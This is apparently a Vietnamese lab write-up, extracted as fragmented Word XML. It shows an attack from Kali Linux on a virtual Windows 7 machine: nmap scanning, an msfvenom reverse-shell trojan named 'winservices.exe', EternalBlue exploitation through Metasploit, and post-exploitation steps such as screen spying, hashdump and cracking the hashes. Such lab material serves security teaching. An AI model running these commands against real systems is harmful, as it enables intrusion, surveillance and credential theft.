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*)Các bước thực hiện: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+) Chuẩn bị máy window 7 ảo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+) Kali linux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Bước 1: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*) Lấy địa chỉ IPv4 address của máy ảo win 7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Địa chỉ Ipv4 address là : 192.168.206.140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Bước 2: Trong màn hình Kali linux mở terminal và sử dụng lệnh :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b w:val="1"/>
          <w:color w:val="ff00ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap 192.168.206.140 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">để quét các cổng port đang mở của máy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Thấy được các cổng port đang mở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ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo sẽ đến bước tạo file trojan ( payload) sử dụng câu lệnh : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff00ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.206.131 LPORT=4444 -f exe -o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff00ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">winservices</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff00ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018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=&gt;Sẽ tạo 1 file có tên là </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">winservices</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> có dạng  “exe” khi file được kích hoạt thì sẽ tạo 1 kết nối ngược về địa chỉ IP : 192.168.206.140 với cổng port là 4444 như đã được cấu hình trong câu lệnh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Bước 3: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Mở 1 màn hình terminal khác và sử dụng lệnh “msfconsole “ để chạy metasploit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Sau khi chạy msfconsole thì sẽ hiện ra msf6 và ở đây sẽ sử dụng câu lệnh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msf6&gt;use ms17   để khai thác exploit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List các exploit được hiện ra và có thể chọn exploit theo mục đích khai thác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Lựa chọn exploit/windows/smb/ms17_010_eternalblue để xâm nhập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Khai thác lỗ hổng SMBv1 trên Windows</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (được gọi là </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EternalBlue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Lỗ hổng này được công bố trong bản vá </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MS17-010</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> của Microsoft.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Nó cho phép thực thi mã từ xa (RCE – Remote Code Execution) trên máy đích </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nếu máy đó chưa được vá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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chạy dịch vụ SMBv1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Tiếp theo sẽ set địa chỉ ip và port muốn khai thác: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Sau khi set xong thi sử dụng lệnh exploit / run để khai thác lỗ hổng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Máy sẽ liên tục gửi các buffer đến cho máy win7 và như trong hình thì lỗ hổng đã khai thác thành công và hiện lên dòng chữ Meterpreter session 1 opened - tức là đã tạo ra 1 phiên làm việc ở trên máy win 7.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Sử dụng lệnh getuid để xem phiên đang  với quyền nào : Như trong ảnh thì phiên đang làm việc với quyền system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Từ đây có thể upload file mã độc mà đã tạo trước đó thông qua lệnh : upload + đường dẫn file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Tiếp theo ở màn hình terminal thứ 2 sẽ khởi tạo 1 phiên làm việc metasploit mới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6762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Tạo 1 kết nối từ máy lắng nghe payload và hoạt động như 1 listener.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Sau khi file mã độc được kích hoạt trên máy nạn nhân thì sẽ thực hiện kết nối ngược về và cung cấp 1 phiên làm việc.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Trong màn hình terminal 1 , sử dụng lệnh shell để thực hiện các các quyền shell trên máy nạn nhân.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Ở màn hình terminal thứ 2 thì sẽ set payload và địa chỉ local host , local port cho payload , khi file mã độc ( payload ) được kích hoạt thì sẽ kết nối ngược về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Sử dụng lệnh run để bắt đầu mở cửa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lắng</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nghe , bước tiếp theo la chỉ cần kích hoạt file mã độc thì sẽ có thể kết nối ngược lại được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Ở màn hình terminal thứ 1 thông qua shell thì sẽ nhập lệnh : winservices.exe để chạy trực tiếp file mã độc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Sau khi chạy được file mã độc thì đã tạo 1 kết nối về được cũng như đưa cho hacker 1 phiên làm việc.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Meterpreter session 1 opened.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Ở đây thì đối với 2 màn hình terminal thì ta có các phiên làm việc khác nhau nó hoạt động như 1 instance metasploit riêng biệt không có khả năng chia sẻ dữ liệu với nhau.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Tức là ta có thể thao tác ở cả hai màn hình terminal cùng 1 lúc với 2 phiên làm việc khác nhau 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Sessions -i 2 để chọn phiên làm việc với id 2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68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Thực hiện lệnh screenshot màn hình  nạn nhân.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Thực hiện lệnh </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshare</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> để xem share trực tiếp màn hình nạn nhân hiện taị và có thể theo dõi các hình vi trên màn hình  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Hoặc có thể sử dụng lệnh hashdump khi ở quyền system để lấy mã hash mật mật khẩu và sau khi sử dụng các tool như hashcat hoặc john the ripper thì có thể lấy được chuỗi plaintext                      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Sử dụng lệnh ps để xem các tiến trình đang chạy trên máy nạn nhân.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Sử dụng lệnh kill 2216 để kết thúc tiến trình có PID là 2216 trên máy nạn nhân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64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Tạm dừng 1 tiến trình đang chạy trên hệ thống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5810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Sử dụng lệnh reboot để khởi động lại máy nạn nhân.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3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1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8.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId32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21.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22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